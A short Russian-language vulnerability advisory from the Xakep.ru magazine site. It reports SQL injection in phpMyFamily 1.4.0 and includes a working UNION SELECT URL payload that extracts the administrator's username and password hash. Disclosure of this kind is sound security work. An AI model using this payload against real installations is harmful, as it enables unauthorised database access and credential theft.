Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Программа: phpMyFamily 1.4.0

Уязвимость позволяет удаленному
пользователю произвести SQL-инъекцию и
получить доступ к базе данных приложения.
Уязвимость обнаружена в сценариях people.php,
track.php, edit.php, document.php, census.php из-за отсутствия
фильтрации входных данных. Удаленный
пользователь может получить
неавторизованный административный доступ
к приложению, выполнить произвольные SQL
команды.

Пример:

http://[host]/[path]/people.php?person=00002'%20UNION%20SELECT%20
NULL,password,NULL,username,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users %20%20WHERE%20admin='Y'%20LIMIT%201,1/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии